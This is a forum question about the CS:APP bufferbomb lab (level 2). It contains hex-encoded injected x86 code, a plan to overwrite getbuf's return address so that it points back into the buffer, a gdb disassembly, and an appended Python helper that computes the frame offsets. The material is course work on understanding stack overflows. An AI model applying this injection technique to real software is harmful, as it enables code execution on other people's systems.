
bufferbomb level2

snowball86 asked on
Assembly
I have code for my exploit string which is

c7 05 c0 a1 04 08 74 28 5e 70 68 c0 8d 04 08 c3

My problem is that I can't figure out how to put it into the buffer and get this particular code to be called.

Am i supposed to do something like this?

c7 05 c0 a1 04 08 74 28 5e 70 68 c0 8d 04 08 c3 xx xx xx xx

where the x's are the beginning address of the buffer? The buffer size is 16, so should I overwrite the return address so that it points back to the beginning of the buffer?

Dump of assembler code for function getbuf:
0x08048f40 <getbuf+0>:  push   %ebp
0x08048f41 <getbuf+1>:  mov    %esp,%ebp
0x08048f43 <getbuf+3>:  sub    $0x18,%esp
0x08048f46 <getbuf+6>:  lea    0xfffffff4(%ebp),%eax
0x08048f49 <getbuf+9>:  mov    %eax,(%esp)
0x08048f4c <getbuf+12>: call   0x8048dd0 <Gets>
0x08048f51 <getbuf+17>: mov    $0x1,%eax
0x08048f56 <getbuf+22>: leave  
0x08048f57 <getbuf+23>: ret    
0x08048f58 <getbuf+24>: nop    
0x08048f59 <getbuf+25>: lea    0x0(%esi),%esi

I don't know how to find the beginning address of the buffer though. I am also not sure if I just put the exploit code into the buffer and then overwrite the return address with the beginning address of the buffer.
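The frame geometry the question is asking about can be read straight off the getbuf disassembly: the argument handed to Gets is %ebp plus the lea displacement, saved %ebp sits at %ebp, and the return address at %ebp+4. The following is an added analysis helper, not code from the original post or from the lab; it embeds a copy of the dump quoted above as its input and assumes, as in the CS:APP lab, that Gets stores a terminating NUL after the characters it reads.

```python
import re

# Constructed copy of the getbuf disassembly quoted in the question (32-bit x86, AT&T syntax).
GETBUF_DUMP = """\
0x08048f40 <getbuf+0>:  push   %ebp
0x08048f41 <getbuf+1>:  mov    %esp,%ebp
0x08048f43 <getbuf+3>:  sub    $0x18,%esp
0x08048f46 <getbuf+6>:  lea    0xfffffff4(%ebp),%eax
0x08048f49 <getbuf+9>:  mov    %eax,(%esp)
0x08048f4c <getbuf+12>: call   0x8048dd0 <Gets>
0x08048f51 <getbuf+17>: mov    $0x1,%eax
0x08048f56 <getbuf+22>: leave
0x08048f57 <getbuf+23>: ret
"""

# Readers that take no length bound, so the caller cannot limit what they write.
UNBOUNDED_READERS = {"Gets", "gets"}

def signed32(v):
    """Interpret a 32-bit displacement such as 0xfffffff4 as a signed offset."""
    return v - (1 << 32) if v & 0x80000000 else v

def analyze_frame(dump):
    """Derive getbuf's frame geometry from its disassembly.

    The buffer passed to the reader is at %ebp plus the lea displacement;
    saved %ebp occupies the 4 bytes at %ebp and the return address is at %ebp+4.
    """
    layout = {"frame_bytes": None, "buf_offset": None, "reader": None}
    for line in dump.splitlines():
        if m := re.search(r"sub\s+\$0x([0-9a-f]+),%esp", line):
            layout["frame_bytes"] = int(m.group(1), 16)
        elif m := re.search(r"lea\s+0x([0-9a-f]+)\(%ebp\),%eax", line):
            layout["buf_offset"] = signed32(int(m.group(1), 16))
        elif m := re.search(r"call\s+0x[0-9a-f]+\s+<(\w+)>", line):
            if m.group(1) in UNBOUNDED_READERS:
                layout["reader"] = m.group(1)
    buf = -layout["buf_offset"]                  # bytes from buffer start to saved %ebp
    layout["bytes_to_saved_ebp"] = buf
    layout["bytes_to_return_address"] = buf + 4  # saved %ebp is 4 bytes wide
    return layout

def classify_input(n_chars, layout):
    """Say what an n-character line does to the frame (assumes Gets also stores a NUL)."""
    written = n_chars + 1
    if written <= layout["bytes_to_saved_ebp"]:
        return "fits in buffer"
    if written <= layout["bytes_to_return_address"]:
        return "corrupts saved %ebp"
    return "overwrites return address"
```

For this dump the helper reports a 24-byte frame with the buffer starting 12 bytes below %ebp, so any line of 12 or more characters already reaches past the buffer, which is the risk an unbounded reader like Gets creates regardless of the declared buffer size.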